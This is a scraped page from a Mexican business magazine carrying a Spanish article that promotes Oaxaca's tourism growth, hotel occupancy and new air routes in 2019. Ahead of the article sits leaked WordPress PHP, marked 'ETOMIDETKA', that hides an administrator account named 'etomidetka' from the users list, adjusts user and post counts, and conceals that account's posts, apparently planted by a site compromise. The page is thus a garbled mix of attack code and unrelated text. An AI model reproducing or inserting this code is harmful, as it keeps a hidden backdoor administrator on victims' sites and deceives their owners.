//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); Oaxaca en la mira del Mundo | Revista Fusión Empresarial
Oaxaca en la mira del Mundo

Históricamente Oaxaca ha sido un estado dotado de maravillas arquitectónicas y naturales, la geografía nos ubicó en una posición privilegiada que dota a sus ochos regiones de rincones mágicos donde habita población sin igual.
Las y los oaxaqueños siempre hemos sabido que las condiciones de la entidad son perfectas para desarrollar y compartir entre nosotros, y con el mundo todo lo que tiene la entidad.
De ese conocimiento hemos desarrollado la vocación turística que actualmente permite ofrecer en el estado 159,834 empleos directos e indirectos.

Durante mucho tiempo se pensó que un estado tan sorprendente como Oaxaca, se podía vender solo; a lo largo de los años se ha comprobado que no basta con ser uno de los sitios con mayores atractivos, hay que enseñar al mundo permanentemente los productos turísticos que se desarrollan de la mano con autoridades estatales, municipales y prestadores de servicios.
Desde el inicio de la administración que encabeza, el Mtro. Alejandro Murat Hinojosa, se planteó como estrategia recuperar el mercado nacional e internacional que se había perdido desde hace más de doce años, hoy a más de tres años de una visión de trabajo; Oaxaca está en la mira del mundo.
Un resultado que solo se logra trabajando de la mano con el sector turístico, llevando un poco de Oaxaca a los mercados potenciales y estableciendo alianzas para incentivar la conectividad que permita abrir caminos para llegar a más destinos.

Así, los resultados se pueden traducir que, al cierre del 2019, en los tres principales destinos del estado; Ciudad de Oaxaca, Bahías de Huatulco y Puerto Escondido, la ocupación hotelera acumulada anual fue del 48.31%, lo que indica un crecimiento del 1.57 puntos con relación al año 2018; mientras que la llegada de turistas registró un crecimiento del 8.75%, al recibir 234,416 más que en el 2018.
En cuanto a la derrama económica, los tres destinos alcanzaron los 16,584 millones de pesos; superando en un 27.27% la generada en el 2018, lo que representa 3,553 millones de pesos más.
Resultados que benefician a todos quienes intervienen en la cadena de valor de la actividad turística.
Hoy Oaxaca está más conectada que nunca, tan solo en el 2019 se abrieron 7 nuevas rutas aéreas; 6 nacionales y 1 internacional que nos conecta con más de 300 destinos, acciones que seguirán creciendo. Y en este primer semestre ya se inauguró el vuelo Tuxtla Gutiérrez – Oaxaca; un vuelo que permite conectar a las entidades del sureste.
En cada temporada vacacional somos testigos que la estrategia de llevar más de Oaxaca al mundo ha redundado en que el mundo esté en Oaxaca.

Juntos, todos los que deseamos que el sector turístico siga siendo un factor estratégico en la economía, estamos comprometidos para seguir incrementando las cifras, obtener reconocimientos y hacer de la entidad, uno de los mejores lugares del mundo para visitar.

Añadir Comentario